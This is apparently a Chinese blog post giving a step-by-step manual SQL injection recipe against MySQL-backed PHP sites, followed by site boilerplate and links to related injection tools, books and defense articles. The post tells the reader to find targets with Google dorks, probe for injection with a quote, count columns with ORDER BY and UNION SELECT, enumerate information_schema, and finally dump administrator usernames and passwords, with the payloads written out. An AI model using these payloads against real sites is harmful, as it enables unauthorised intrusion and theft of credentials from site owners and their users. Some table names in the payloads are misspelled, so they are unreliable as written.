`
gcgmh
  • 浏览: 349262 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

sql 注入

阅读更多

1。在google里面搜索site:www.domain.com inurl:php?nid(uid,gid)=

2。打开页面,在url后面加上',判断注入点

3。在url后面加上 order by 10-- 判断这个库里面有多少字段

=====================================

一般不能order by的注入点是因为URL那个参数就是order by 后面的值
比如www.hackme.com/file.php?id=22
SQL是select xx from xx where xx=xx order by $id 所以我们不能再order by了
这样的情况可以用union Select 1--   union select 1,2--  union select 1,2,3-- ...
这样递增的方式来取得字段数

=====================================

4。在url后面 加上 and 1=2 union all select 1,2,3,4,5--判断页面显示字段是那几个字段

5。在url上用and 1=2 union all select 1,2,version(),4,5--判断mysql的数据库版本

6。在url上用and 1=2 union all select 1,2,user()4,5--判断mysql的当前的用户名

7。用and 1=2 union all select 1,2,database()4,5--判断mysql当前的数据库名

8。用and 1=2 union all select 1,2,table_name,4,5 from information_scheam.tables where table_schema=(刚才查到数据库名的16进制显示) limit 0,1-- 找这个数据库里面的用户密码管理表,通过修改limit后面的0来查找(一般是admin,administrator等等名称的表)。

==========================================

如果报出:解决联合查询Illegal mix of collations for operation 'UNION'问题,这个错误的原因是两个段的编码不同导致的,这是只要加个hex就可以了如:unhex(hex(table_name))

==========================================

9。用and 1=2 union all select 1,2,column_name,4,5 from information_scheam.columns where table_name=(表名的16进制显示) limit 0,1-- 通过控制limit后面的0找到这个表里面的管理用户名和密码的那2个列的名称 

10。用and 1=2 union all select 1,2,username,password,5 from administrators limit 0,1--,通过控制limit来显示保存在表里面的用户名和密码

 

分享到:
评论

相关推荐

    SQL注入全面讲解技术文档

    SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击。 全文分为十...

    SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。

    SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。 此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试...

    sql注入sql注入sql注入sql注入sql注入

    sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入

    C#防SQL注入代码的三种方法

    对于网站的安全性,是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞,那势必将造成很大的损失。为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全... C#防SQL注入方法一  在Web.config文件中

    寻找sql注入的网站的方法(必看)

    方法一:利用google高级搜索,比如搜索url如.asp?... 您可能感兴趣的文章:Java面试题解析之判断以及防止SQL注入SQL注入原理与解决方法代码示例通过ibatis解决sql注入问题Win2003服务器防SQL注入神器–D盾_IIS防火墙

    SQL注入攻击与防御(第2版).part1

    SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,《安全技术经典译丛:SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入问题。  《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009...

    sql注入工具sql注入工具sql注入工具sql注入工具

    sql注入工具sql注入工具sql注入工具sql注入工具sql注入工具sql注入工具

    超级sql注入工具

    超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...

    安全测试-常见sql注入方法,命令

    安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...

    SQL 注入天书.pdf

    SQL 注入学习天书

    SQL注入攻击与防御

    SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL注入攻击与防御》是目前唯一一本专门致力于讲解SQL威胁的图书。《SQL注入攻击与防御》作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的...

    sql注入攻击流量情况

    sql注入攻击流量情况

    sql注入讲解ppt.pptx

    对sql注入一些基础知识的讲解

    SQL注入之如何检测与判断详细过程

    SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种...

    SQL注入攻击与防御(安全技术经典译丛)

    本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL...

    利用谷歌搜索SQL注入漏洞关键词

    利用谷歌搜索SQL注入漏洞关键词 目标关键字+inurl:id 英语字母及单词+inurl:id 网站域名+inurl:id 阿拉伯数字+inurl:id inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct....

    超级SQL注入工具

    超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...

    C# MVC 过滤器防止SQL注入

    C# MVC 过滤器防止SQL注入

    pangolinsdl—sql注入工具

    pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便

Global site tag (gtag.js) - Google Analytics